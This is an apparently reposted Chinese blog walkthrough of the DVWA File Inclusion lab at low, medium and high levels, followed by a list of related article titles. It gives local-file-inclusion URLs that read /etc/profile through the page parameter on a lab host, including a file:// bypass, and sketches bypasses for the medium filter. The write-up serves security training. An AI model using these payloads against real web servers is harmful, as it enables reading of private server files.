DVWA - File Inclusion (low, medium, high)
来源:互联网 发布:国外免费linux服务器 编辑:程序博客网 时间:2024/04/30 18:55
low
观察URL可发现,注入点在page,low等级直接注入
http://192.168.67.22/dvwa/vulnerabilities/fi/?page=/etc/profile
返回结果如下:
# /etc/profile: system-wide .profile file for the Bourne shell (sh(1)) # and Bourne compatible shells (bash(1), ksh(1), ash(1), ...). if [ "$PS1" ]; then if [ "$BASH" ] && [ "$BASH" != "/bin/sh" ]; then # The file bash.bashrc already sets the default PS1. # PS1='\h:\w\$ ' if [ -f /etc/bash.bashrc ]; then . /etc/bash.bashrc fi else if [ "`id -u`" -eq 0 ]; then PS1='# ' else PS1='$ ' fi fi fi if [ -d /etc/profile.d ]; then for i in /etc/profile.d/*.sh; do if [ -r $i ]; then . $i fi done unset i fi export JAVA_HOME=/opt/jdk1.8.0_25 export CLASS_PATH=.:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar export PATH=$PATH:$JAVA_HOME/bin
medium
查看源码,发现以黑名单的方式过滤(删掉)了http://, https://, ../和..\
// Input validation $file = str_replace( array( "http://", "https://" ), "", $file ); $file = str_replace( array( "../", "..\"" ), "", $file );
绕过思路http转大写,使用绝对路径等等。
high
查看源码,发现以白名单的方式允许file开头的文件和include.php
// Input validation if( !fnmatch( "file*", $file ) && $file != "include.php" )
绕过思路,以file://协议读取文件即可,注入代码如下:
http://192.168.67.22/dvwa/vulnerabilities/fi/?page=file:///etc/profile
0 0
- DVWA - File Inclusion (low, medium, high)
- DVWA - File Upload (low, medium, high)
- DVWA - CSRF (low, medium, high)
- DVWA - Brute Force (low, medium, high)
- DVWA - Command Injection (low, medium, high)
- DVWA - SQL Injection (low, medium, high)
- DVWA - XSS (Reflected) (low, medium, high)
- DVWA - XSS (Stored) (low, medium, high)
- File Inclusion -low
- File Inclusion -medium
- DVWA-1.9全级别教程之File Inclusion
- DVWA安装后File Inclusion出现问题The PHP function allow_url_include is not enabled.
- DVWA-1.10全级别教程之File Inclusion(学习笔记)
- DVWA Upload漏洞(medium)
- DVWA - SQL Injection (Blind) (low)
- high与low
- 详细解析rand()%(high-low+1)+low
- SQL injection on DVWA (Low Level)
- ES6的新特性
- 启动自执行 CommandLineRunner
- ECMAScript6
- linux下修改/etc/profile文件
- 新年快乐动态PPT模板免费分享
- DVWA - File Inclusion (low, medium, high)
- kendo 正则表达式验证的 bug
- Not Hello World
- 打造优雅的PC环境软件篇
- PHP abstract与interface之间的区别
- 顶点着色器-经过的空间变换
- oracle导出问题
- 前后端分离
- Gensim Word2vec简介